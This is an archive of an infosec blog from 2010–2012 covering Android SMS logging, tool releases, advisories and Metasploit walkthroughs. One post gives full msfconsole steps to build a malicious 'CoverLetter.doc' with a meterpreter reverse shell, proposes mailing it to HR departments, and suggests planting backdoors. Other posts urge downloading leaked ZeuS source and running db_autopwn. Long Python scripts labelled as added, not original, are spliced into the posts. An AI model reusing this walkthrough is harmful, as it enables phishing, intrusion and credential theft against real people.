Category: Infosec News

Jan 18 2012

Podcast Appearance “Attack of the Android”

Hello all, I hope your year is going well so far; I just wanted to drop a line and mention that a few weeks ago I appeared on the “Attack of the Androids” podcast, episode 16. A little background on the podcast: they are a weekly audio podcast focused on the Google Android operating system and community.

You can find them on Google+ or follow them on Twitter at @aotaradio. Cool cast; check them out!

Dec 18 2011

Handcent SMS logs all your sent messages

In light of all the CarrierIQ press I started wondering what other applications on my phone might be doing things that I am not aware of. So I installed SQLite Editor and started poking around my phone; that’s when I decided to see what my SMS client “Handcent” was up to. Since I wanted to view the output on a bigger monitor, I fired up an adb shell and used SQLite to see what Handcent SMS was hiding under the hood.

I used the following command to search under /data on my device for any files with a .db extension, since that indicates a database file (the glob is quoted so the local shell does not expand it before it reaches the device):

adb shell find /data -name '*.db'

The command turned up several databases on my phone, but today we will be looking at one in particular: Handcent's "hc_sms.db".

For this part we will use sqlite to view the database layout (schema)
and its contents:

sqlite> .schema
CREATE TABLE DELIVERY_REPORT (MESSAGE_ID INTEGER Primary KEY,TIMESTAMP text,UPDATE_TIMESTAMP text);

CREATE TABLE SEND_LOG (ID Integer Primary KEY,SID INTEGER ,SEND_TYPE INTEGER,BEGIN_SEND_TIME text,END_SEND_TIME text,SEND_CONTENT TEXT,
SENDING_PERSON_NUBER INTEGER,SUCCESS_NUMBER INTEGER,FAIL_NUMBER INTEGER);

CREATE TABLE SEND_LOG_DETAIL (SID INTEGER,PID INTEGER,BEGIN_SEND_TIME TEXT,END_SEND_TIME TEXT,PERSON_NAME TEXT,PERSON_NUMBER TEXT,SENDING_MESSAGE_NUMBER INTEGER,SENT_SUCCESS_NUMBER INTEGER,SENT_FAIL_NUMBER INTEGER);
CREATE TABLE android_metadata (locale TEXT);

sqlite> .tables
DELIVERY_REPORT   SEND_LOG          SEND_LOG_DETAIL   android_metadata
sqlite>

After running select * from SEND_LOG; I saw, to my amazement, every text message I had sent since installing the Handcent application, both DELETED and undeleted.

Running select * from SEND_LOG_DETAIL showed the same information, but this log also held the recipient's name and phone number.

Now my question is: if I am deleting a message and believe it is being deleted, why would Handcent choose to keep a copy of that message in an unencrypted database where anyone can access it? I would love to hear from them and try to understand why this is being done.
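As an added example (not part of the original post), here is a small Python script that reproduces the audit above offline: it builds a scratch copy of hc_sms.db from the schema printed above, fills it with a couple of constructed rows, and then walks every table looking for columns that hold message bodies or contact details, finishing with the join that shows what a copy of the database gives away. Run it with the path of a real hc_sms.db pulled via adb pull to check the live file the same way; the column-name hints are my own heuristic, not anything Handcent documents.

```python
import sqlite3

# Table definitions copied from the .schema output above (SEND_LOG_DETAIL
# rejoined onto one line); the misspelt SENDING_PERSON_NUBER is Handcent's.
HC_SMS_SCHEMA = """
CREATE TABLE DELIVERY_REPORT (MESSAGE_ID INTEGER Primary KEY,TIMESTAMP text,UPDATE_TIMESTAMP text);
CREATE TABLE SEND_LOG (ID Integer Primary KEY,SID INTEGER ,SEND_TYPE INTEGER,BEGIN_SEND_TIME text,END_SEND_TIME text,SEND_CONTENT TEXT,SENDING_PERSON_NUBER INTEGER,SUCCESS_NUMBER INTEGER,FAIL_NUMBER INTEGER);
CREATE TABLE SEND_LOG_DETAIL (SID INTEGER,PID INTEGER,BEGIN_SEND_TIME TEXT,END_SEND_TIME TEXT,PERSON_NAME TEXT,PERSON_NUMBER TEXT,SENDING_MESSAGE_NUMBER INTEGER,SENT_SUCCESS_NUMBER INTEGER,SENT_FAIL_NUMBER INTEGER);
CREATE TABLE android_metadata (locale TEXT);
"""

# Heuristic (my own, not Handcent's): column names containing these fragments
# usually hold message bodies or the other party's contact details.
SENSITIVE_HINTS = ("CONTENT", "BODY", "PERSON_NAME", "PERSON_NUMBER", "ADDRESS")


def build_sample_db(path=":memory:"):
    """Create a scratch hc_sms.db holding two constructed sent messages."""
    conn = sqlite3.connect(path)
    conn.executescript(HC_SMS_SCHEMA)
    conn.executemany(
        "INSERT INTO SEND_LOG (ID, SID, SEND_TYPE, BEGIN_SEND_TIME, END_SEND_TIME,"
        " SEND_CONTENT, SENDING_PERSON_NUBER, SUCCESS_NUMBER, FAIL_NUMBER)"
        " VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)",
        [
            (1, 1, 0, "2011-12-01 09:00:00", "2011-12-01 09:00:02", "running late, start without me", 1, 1, 0),
            (2, 2, 0, "2011-12-02 18:30:00", "2011-12-02 18:30:01", "door code is 4471", 1, 1, 0),
        ],
    )
    conn.executemany(
        "INSERT INTO SEND_LOG_DETAIL (SID, PID, BEGIN_SEND_TIME, END_SEND_TIME, PERSON_NAME,"
        " PERSON_NUMBER, SENDING_MESSAGE_NUMBER, SENT_SUCCESS_NUMBER, SENT_FAIL_NUMBER)"
        " VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)",
        [
            (1, 1, "2011-12-01 09:00:00", "2011-12-01 09:00:02", "Alice Example", "+15550100", 1, 1, 0),
            (2, 2, "2011-12-02 18:30:00", "2011-12-02 18:30:01", "Bob Example", "+15550101", 1, 1, 0),
        ],
    )
    conn.commit()
    return conn


def sensitive_columns(conn, table):
    """Return the columns of `table` whose names match a SENSITIVE_HINTS fragment."""
    cols = [row[1] for row in conn.execute(f'PRAGMA table_info("{table}")')]
    return [c for c in cols if any(h in c.upper() for h in SENSITIVE_HINTS)]


def audit(conn):
    """Map each table that holds message or contact data to its row count and those columns."""
    findings = {}
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        cols = sensitive_columns(conn, table)
        if not cols:
            continue
        rows = conn.execute(f'SELECT COUNT(*) FROM "{table}"').fetchone()[0]
        findings[table] = {"rows": rows, "columns": cols}
    return findings


def retained_messages(conn):
    """Join the two logs to show recipient, number and body for every retained message."""
    query = (
        "SELECT d.PERSON_NAME, d.PERSON_NUMBER, l.SEND_CONTENT"
        " FROM SEND_LOG AS l JOIN SEND_LOG_DETAIL AS d ON l.SID = d.SID ORDER BY l.ID"
    )
    return conn.execute(query).fetchall()


if __name__ == "__main__":
    import sys
    # Pass the path of a pulled hc_sms.db to audit the real file; the default is the sample.
    db = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    for table, info in audit(db).items():
        print(f"{table}: {info['rows']} rows, columns {', '.join(info['columns'])}")
    for name, number, content in retained_messages(db):
        print(f"  to {name} <{number}>: {content!r}")
```

The same audit() works on any app's SQLite file, which is the point: a message that the UI reports as deleted is only gone if no table still carries its body, and counting rows in the tables that have a content column is the quickest way to check.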

Jun 22 2011

Should I Change My Password?


While sorting through my Twitter feed yesterday I noticed the following site and an informative article over at SC Magazine explaining the site’s purpose.

In short “A Sydney security researcher has developed a web portal that allows administrators to check if work email accounts have been compromised.

The portal, (https://shouldichangemypassword.com) allows users to search through databases of stolen email addresses collated by researcher Daniel Grzelak.”

Read more over at SCMagazine.com.

My first reaction was: hmm, this would be a perfect place for a spammer to harvest fresh email addresses, one with every query to the database. But as the site owner states, “The email you enter will NOT be stored, transmitted, or otherwise used beyond this check.”

In the end I think this is a great resource; someone actually decided to do something useful with all the hacked data that is being leaked every week or so. I sent the researcher a tweet requesting a feature to do a blind search on a domain name instead of just an email address, so you can easily see whether anyone in your organization has been compromised.

May 19 2011

Disclosure of over 35 million Google user profiles

While checking my IRC and Twitter stream this morning I noticed some chatter surrounding a comment from a user by the name of @mikkohypponen on Twitter mentioning that “Google provides the addresses of all of their 35,513,445 user profiles”; that’s about 35 million people.

You can verify this for yourself by visiting the provided URL http://bit.ly/iT6p3n or going directly to https://ssl.gstatic.com/s2/sitemaps/profiles-sitemap.xml. What you will see at that link is an XML file listing the various profile groupings. Copy one of those links into your browser and you will be taken to another page with links to the actual profiles; open any of them and you will be a bit surprised.


Why should you care about this, you might ask? Easy: it's only a matter of time before someone creates a script to harvest all of the following:

  • Usernames, first-name, last-name
  • GPS co-ordinates of places you have lived, if you filled that out
  • Personal photos

That should concern you a bit, but maybe it does not concern Google. According to https://twitter.com/#!/tomokas, he mentioned this to Google back in 2008 and only got an auto-response email.


May 13 2011

Exploit packs overview, Zeus code leaked

I recently came across a really interesting intro write-up on browser exploit packs. The research team installed and tested over 40 different packs and provided some really nice feedback; here is the link.

For anyone not familiar with what an exploit pack is, here is a brief definition: “A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to alter a user’s browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.”

The infamous ZeuS or zbot Trojan has made a name for itself in this arena. Even though zbot does not directly exploit any system vulnerability, it is very successful at infecting its victims. Until recently Zeus was being sold on the underground black market for anywhere from $5,000 to $10,000 or even more, so it was hard for the average person to get hold of a copy and review the source code.

Well, not until a few days ago, that is. Now if you search for “Download the ZeuS Source Code”, you will come across several sites hosting a leaked copy of “Zeus 2.0.8.9”, and from the looks of things it's a fully loaded copy. With that said, grab your copy, turn on your VMs and let the learning begin.

Links:

https://secure.wikimedia.org/wikipedia/en/wiki/Browser_exploit

http://www.scmagazineuk.com/zeus-source-code-now-available-for-5000-as-predictions-made-that-its-cost-will-continue-to-drop/article/199995/

http://www.mdl4.com/2011/05/download-zeus-source-code/

Now while reading about exploit packs I started wondering how I can get myself a copy without having to spend

“Exploit packs are criminally appealing because victim exploitation is quick and seamless if a vulnerability exists. The victim may not notice anything different in their computer’s behavior post drive-by. The majority of exploit packs we tested simply required the client computer visit the root index.php page. The newer families required a drive-by to a specifically crafted URI that corresponded to a specific “user” (renter) of the managed exploit pack.”

Feb 08 2011

Network Miner 1.0 released

NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.

Now that we have the explanation out of the way, I would like to start by saying how excited I was when I saw an announcement on the Pauldotcom mailing list about version 1.0 being released. I have been using this tool for a while after being introduced to it on an episode of hak5 a while back, and since then it's been one of my favorite applications for parsing PCAP files and looking for goodies.

This new release has lots of new features to keep you busy for a while:

  • Support for Per-Packet Information header (WTAP_ENCAP_PPI) as used by Kismet and sometimes Wireshark WiFi sniffing.
  • Extraction of Facebook as well as Twitter messages into the Messages tab. Added support to extract emails sent with Microsoft Hotmail (i.e. Windows Live) into the Messages tab.
  • Extraction of twitter passwords from when settings are changed. Facebook user account names are also extracted (but not Facebook passwords).
  • Extraction of gmailchat parameter from cookies in order to identify users through their Google account logins.
  • Protocol parser for Syslog. Syslog messages are displayed on the Parameter tab.

You can read the complete change-log here for more details.

If that is not enough to make you want to try this application out, I don’t know what else is. I fired up version 1.0 for a few minutes before writing this article and I was pretty impressed with my results. I was able to quickly and easily harvest all images browsed from my PC and IRC chat logs, identify key information about hosts on my network (ports, OS type, service version numbers) and much more, without needing to run a noisy port scanner.

Q&A with the main developer of NetworkMiner

Question: What was the purpose behind developing NetworkMiner?

Answer: I started developing NetworkMiner back in 2006 while I was working with SCADA security for a major electric utility company in Europe. My idea was to give network admins and process control engineers a view of which hosts are actually on the network as opposed to what their documentation said. The reason for building a passive sniffer instead of yet another port scanner was that SCADA and process control networks tend not to handle port scans very well, and I sure didn’t wanna bring down the network of a running plant!

Q: How many core developers are involved with this project?
A: I’m the only developer of NetworkMiner.

Q: Which group of individuals do you think can benefit most from this application (forensics investigators, pentesters, network admins, etc.)?

A: NetworkMiner today is primarily designed for computer security incident responders and law enforcement who need to do forensic analysis of network traffic.

Q: How long has version 1.0 been in development?

A: I’ve been working on the 1.0 release of NetworkMiner since June 2010. The last three months before the release were spent on testing and validating the release. I also have a beta testing group, consisting of talented network forensics professionals, who have provided additional validation of the release.

Q: What key features would you like to highlight in this release, in the free as well as the paid version?

A: Some of the major improvements are:
In addition to what's listed above, the Professional version of NetworkMiner also includes a protocol identification feature, which can identify which application layer protocol is being used in order to apply the appropriate protocol parser. This means that running an FTP or web server on a non-standard port will not be sufficient to fool NetworkMiner Professional.

You can also export the results from the various tabs in NetworkMiner Professional into a CSV file that can be opened with Excel or OpenOffice. The Professional release also includes a command line version of NetworkMiner, which comes in very handy when you need to wrap the pcap parsing functionality into a shell script or an automatized environment for traffic analysis.

Q: Are there any plans to make a Nix version of this application?

A: I have plans to look further into Mono (http://www.mono-project.com ) to build cross-platform support for NetworkMiner, but implementing new features has to this date had higher priority for me. It is, however, possible to run NetworkMiner from Linux by using Wine already today.

Q: What is the recommended deployment strategy to properly maximize NetworkMiner’s potential (GB nic, dual nic, physical vs vmware guest etc)?

A: My recommendation for achieving a reliable and fast traffic capture solution is to use a physical FreeBSD machine running dumpcap for traffic capture. You can then open the pcap files from dumpcap with NetworkMiner for analysis on a Windows machine. When analyzing malware I actually recommend running NetworkMiner on a virtualized Windows machine without any network support, in order to minimize the risk of spreading the malware. NetworkMiner does not use much RAM, but can be fairly CPU and disk intensive. So make sure you have a fast processor and an HDD with fast access times and high write speed.

Q: If someone wants to learn more about this application, provide feedback or report bugs what’s the best way to go about this?

A: The best way to learn more about NetworkMiner is to follow my blog on http://www.netresec.com/?page=Blog . Feedback in the form of, for example, help or feature requests can be posted to SourceForge on http://sourceforge.net/projects/networkminer/support

You can download NetworkMiner from any of the following URLs, so go get your copy and start to spread the word:
http://www.netresec.com/?page=NetworkMiner
http://sourceforge.net/projects/networkminer/
http://networkminer.sourceforge.net/

I must give a special THANK YOU to Erik Hjelmvik, developer of NetworkMiner, for taking time out of his busy week to help us understand a little bit more about this awesome project.

Jan 18 2011

[News] Google Password Decryptor v3.0 Released

On January 11, the guys over at http://securityxploded.com released Google Password Decryptor version 3.0. For anyone who has not tried this tool before or has never heard of it, I urge you to download it and give it a shot; you will be surprised.

GooglePasswordDecryptor is the FREE software to instantly recover stored Google account passwords saved by various Google applications as well as popular web browsers and messengers. Most of Google’s desktop applications, such as GTalk and Picasa, store the Google account password to spare the user the hassle of entering the password every time. Even the web browsers and messengers store login passwords, including Google account passwords, in an encrypted format. GooglePasswordDecryptor automatically crawls through each of these applications and recovers the encrypted Google account password in clear text.

Google uses a single centralized account for managing all of its services, such as Gmail, Picasa, GTalk, iGoogle, Desktop Search, etc. Since all of these core services are controlled by one account, losing the password will easily make one’s life miserable. Also, trying the Google password recovery service will turn out to be useless unless you have set up the secondary account for receiving the password and you remember all the personal details that you entered at the time of account creation. In such a situation GooglePasswordDecryptor helps in recovering your Google password from any of the supported applications.

The current version supports password recovery from less common browsers such as Safari and Flock. It also presents a command line interface, which is more helpful for penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for forensic officials in their investigations.

GooglePasswordDecryptor supports recovery of the stored Google account password from most of the prominent Google desktop applications, popular internet browsers and messengers. Here is the complete list of supported applications.

  • Google Talk
  • Google Picasa
  • Google Desktop Search
  • Gmail Notifier
  • Firefox
  • Internet Explorer
  • Google Chrome
  • Opera Browser
  • Apple Safari
  • Flock Browser
  • Paltalk Messenger
  • Pidgin Messenger
  • Miranda Messenger

Read more at http://securityxploded.com/googlepassworddecryptor.php

I downloaded the app and ran the portable version, and to my surprise it was able to pull the credentials from my Pidgin Messenger and Google Picasa installations.


Time to think of a new approach for using these apps!


Jan 05 2011

New Year, New MS Zero Day

The new year usually brings hope for change, but it seems to be the same old story with Microsoft: first advisory of the year and already you have to sit around waiting for MS to release a patch. Today's blog post is about the new vulnerability in the Graphics Rendering Engine. The guys over at www.metasploit.com have created a working exploit module for it, which I was testing, and it seems to work as stated.

According to the note in the module: “This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.”

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.
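The module note above pins the bug on a single header field, which gives a defender something concrete to look for in mail attachments and file shares while no patch exists. The following Python is an added example, not code from Metasploit, Microsoft or the original post: it parses the 40-byte BITMAPINFOHEADER that DIB thumbnails carry, flags a biClrUsed value that is negative when read as a signed 32-bit integer (the condition the note describes) or larger than the bit depth allows, and scans an arbitrary blob for such headers. The two sample headers and the bytes around them are constructed here; the plausibility checks and field limits are my own heuristics, not Microsoft's parser, and a thumbnail stored compressed inside a container has to be unpacked before this scan can see it.

```python
import struct

# BITMAPINFOHEADER, little-endian: biSize, biWidth, biHeight, biPlanes, biBitCount,
# biCompression, biSizeImage, biXPelsPerMeter, biYPelsPerMeter, biClrUsed, biClrImportant
BIH_FORMAT = "<IiiHHIIiiII"
BIH_SIZE = struct.calcsize(BIH_FORMAT)  # 40 bytes
BIH_FIELDS = ("biSize", "biWidth", "biHeight", "biPlanes", "biBitCount", "biCompression",
              "biSizeImage", "biXPelsPerMeter", "biYPelsPerMeter", "biClrUsed", "biClrImportant")
VALID_BIT_COUNTS = {1, 4, 8, 16, 24, 32}


def parse_bih(buf):
    """Unpack the first 40 bytes of buf into a BITMAPINFOHEADER dict."""
    return dict(zip(BIH_FIELDS, struct.unpack(BIH_FORMAT, buf[:BIH_SIZE])))


def as_signed32(value):
    """Reinterpret an unsigned DWORD the way a parser that uses a signed int would."""
    return value - (1 << 32) if value & 0x80000000 else value


def check_bih(hdr):
    """Return the reasons this header is suspicious (an empty list means it looks sane)."""
    findings = []
    clr_used = as_signed32(hdr["biClrUsed"])
    if clr_used < 0:
        # The condition named in the module note: a "negative" biClrUsed.
        findings.append(f"biClrUsed reads as {clr_used} when treated as signed")
    elif hdr["biBitCount"] <= 8 and clr_used > (1 << hdr["biBitCount"]):
        # Palette images cannot legitimately declare more entries than 2**bpp (my limit).
        findings.append(f"biClrUsed {clr_used} exceeds {1 << hdr['biBitCount']} palette entries")
    return findings


def looks_like_bih(buf):
    """Cheap plausibility test so random bytes are not reported as headers (my heuristic)."""
    if len(buf) < BIH_SIZE:
        return False
    hdr = parse_bih(buf)
    return hdr["biSize"] == BIH_SIZE and hdr["biPlanes"] == 1 and hdr["biBitCount"] in VALID_BIT_COUNTS


def scan_blob(blob):
    """Find every plausible BITMAPINFOHEADER in blob; return the suspicious ones as (offset, findings)."""
    marker = struct.pack("<I", BIH_SIZE)
    hits = []
    for off in range(0, len(blob) - BIH_SIZE + 1):
        if blob[off:off + 4] != marker or not looks_like_bih(blob[off:off + BIH_SIZE]):
            continue
        findings = check_bih(parse_bih(blob[off:off + BIH_SIZE]))
        if findings:
            hits.append((off, findings))
    return hits


def make_bih(width, height, bit_count, clr_used):
    """Build a header for the constructed samples below."""
    return struct.pack(BIH_FORMAT, BIH_SIZE, width, height, 1, bit_count, 0, 0, 2835, 2835, clr_used, 0)


# Constructed samples: a sane 8-bit header and one whose biClrUsed is -1 as a signed value.
BENIGN_HEADER = make_bih(16, 16, 8, 256)
SUSPICIOUS_HEADER = make_bih(16, 16, 8, 0xFFFFFFFF)
SAMPLE_DOCUMENT = b"\x00" * 64 + BENIGN_HEADER + b"junk" * 8 + SUSPICIOUS_HEADER + b"\x00" * 16


if __name__ == "__main__":
    import sys
    # Pass a file path to scan a real document; the default is the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DOCUMENT
    for offset, reasons in scan_blob(data):
        print(f"offset {offset:#x}: " + "; ".join(reasons))
```

The signed reinterpretation in as_signed32 is the whole trick: the field is a DWORD on disk, so the "negative" value the note talks about is simply one with the top bit set, and a parser that trusts it as a palette-entry count is what the mitigation on shimgvw.dll is protecting.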


Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious ones). See the Microsoft advisory for details.

Test Lab Setup:

  • I used VMware Workstation with two hosts (XP and BT4)
  • I tested this against a Windows XP SP3 host
  • I used Metasploit v3.6.0-dev [core3.6 api:1.0] with SVN revision 11471 on BackTrack 4 R2
  • The exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

  • Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host; once it was up I issued the svn up command to ensure I had the latest and greatest.
  • Selected my exploit –> msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
  • Set the filename and output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH /opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (the host you want the victim to reverse connect to):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to set up our reverse handler to listen on port 4545 for any incoming connections once our victim views or opens our specially crafted file. We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to connect back home :) .

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it, you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, set up a persistent Meterpreter backdoor as shown by Carlos, or start capturing Windows logons with SmartLocker; basically the sky’s the limit. Have fun hacking something.

Reference links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

Nov 30 2010

FreeBSD-SA-10:10.openssl “Time to patch”

I noticed an email this morning mentioning an OpenSSL issue that affects the FreeBSD platform, and I wanted to mention it again in case anyone missed it when it came out yesterday.

I just patched my system according to the steps in the advisory and I will report back if I experience any issues after patching.

I. Background

FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.

II. Problem Description

A race condition exists in the OpenSSL TLS server extension code
parsing when used in a multi-threaded application, which uses
OpenSSL’s internal caching mechanism. The race condition can lead to
a buffer overflow. [CVE-2010-3864]

A double free exists in the SSL client ECDH handling code, when
processing specially crafted public keys with invalid prime
numbers. [CVE-2010-2939]

III. Impact

For affected server applications, an attacker may be able to utilize
the buffer overflow to crash the application or potentially run
arbitrary code with the privileges of the application. [CVE-2010-3864].

It may be possible to cause a DoS or potentially execute arbitrary code in
the context of the user connection to a malicious SSL server.
[CVE-2010-2939]

IV. Workaround

No workaround is available, but CVE-2010-3864 only affects FreeBSD 8.0
and later.

It should also be noted that CVE-2010-3864 affects neither the Apache
HTTP server nor Stunnel.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch
dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch.asc

[FreeBSD 8.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install

NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html>

3) To update your vulnerable system via a binary patch:

Systems running 7.1-RELEASE, 7.3-RELEASE, 8.0-RELEASE or 8.1-RELEASE
on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Links:

http://www.freebsd.org/security/advisories.html

http://security.freebsd.org/advisories/FreeBSD-SA-10:10.openssl.asc

Oct 01 2010

Notes for Linux Basix Eps24

Show notes for Linux Basix podcast:

Discussion Links:

News: http://www.wired.com/threatlevel/2010/09/zeus-botnet-ring/

Zeus botnet ring: Thirty-seven people are being charged in the U.S. for their alleged role in an international fraud ring based in East Europe that stole more than $3 million from bank accounts belonging primarily to small businesses and municipalities, according to indictments released Thursday.

The sophisticated ring included a multitude of East Europeans who entered the U.S. on student visas and fake passports to operate as so-called “money mules,”  laundering funds stolen from U.S. accounts and sending the money overseas.

Bye Bye BIOS: New PCs could start in just seconds, thanks to an update to one of the oldest parts of desktop computers. The upgrade will spell the end for the 25-year-old PC start-up software known as BIOS that initialises a machine so its operating system can get going.

The code was not intended to live nearly this long, and adapting it to modern PCs is one reason they take as long as they do to warm up. BIOS’ replacement, known as UEFI, will predominate in new PCs by 2011. The acronym stands for Unified Extensible Firmware Interface and is designed to be more flexible than its venerable predecessor.

News: http://www.wired.com/gadgetlab/2010/09/data-collection-android/

Data collection on Android: Something as simple as changing your Android phone’s wallpaper or downloading a ringtone could transmit personal data about you, including your location, without your knowledge.

Sound far-fetched? It’s not: about 15 of 30 randomly selected, popular, free Android apps sent users’ private information to remote advertising servers, and two-thirds of the apps handled data in ambiguous ways, say researchers.

News: http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=227500797

DHS Launches Cyber Attack Exercise: For three or four days this week, the Internet will come under a virtual attack from an unknown adversary, and it will be up to the government and private sector’s coordinated efforts to root out the cause and work together to keep systems up and running — at least within the simulated confines of the Department of Homeland Security’s Cyber Storm III exercise, which begins Tuesday.

The Cyber Storm series of exercises simulates large cyber attacks on critical infrastructure and government IT assets in order to test the government’s preparedness. Specifically, this year’s exercise will be the first time DHS will test both the draft National Cyber Incident Response Plan (an effort to provide a coordinated response to major cybersecurity incidents) that will be publicly released later this year and the new National Cybersecurity and Communications Integration Center (the hub of DHS’ cybersecurity coordination efforts).

Tech segment: “Nessus Bridge for Metasploit”

The idea for this segment, and for a future blog post that I will be releasing tomorrow with an interview with the author, came about from a posting I saw on Twitter this week. After reading the author’s site I said to myself, this is some “pretty cool stuff”.

Basic Idea:

The general concept is to let you do various tasks with your Nessus server from within the msf command line. By that I mean scan with Nessus, review the results, import the results and then exploit the results.

Below is the current and future list of features that the author is developing:

  • Generic Commands
  • Reports Commands
  • Scan Commands
  • Plugin Commands
  • User Commands
  • Policy Commands

Check out his blog and keep an eye on this project –> http://blog.zate.org

What do you need to start testing:

  • A host with Metasploit installed and configured (I recommend BackTrack 4)
  • A host with a Nessus server installed and updated (I recommend you install it on your BT4 host)
  • A vulnerable host to test with (I recommend you download Metasploitable)

Once you have the above criteria met, log into your Nessus server via the web interface and create your test policy. From this point onwards you can log out of your server and close your web browser.

Next do the following:

  1- Load up your Metasploit console via /pentest/exploit/framework3/msfconsole
  2- Ensure you have the most updated version: “svn up”
  3- Load the nessus module: “load nessus”
  4- Connect to your nessus server with “nessus_connect user@myhost:8834 ok”
  5- Start your first scan with “nessus_scan_new <policy id> <scan name> <targets>”
  6- While it is running you can issue “nessus_scan_status” to see when it has completed
  7- Next get your report ID with “nessus_report_list”
  8- Create a db workspace and import the scan results: “db_connect” then “nessus_report_get <report id>”
  9- Choose a report ID number and use “nessus_report_hosts <report id>” to view the details, so you can see whether your host has any high-risk vulnerability to exploit with MSF.

From here on you can issue the db_autopwn commands and have fun:

Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

Go out and have some fun, and look for my follow-up post tomorrow.
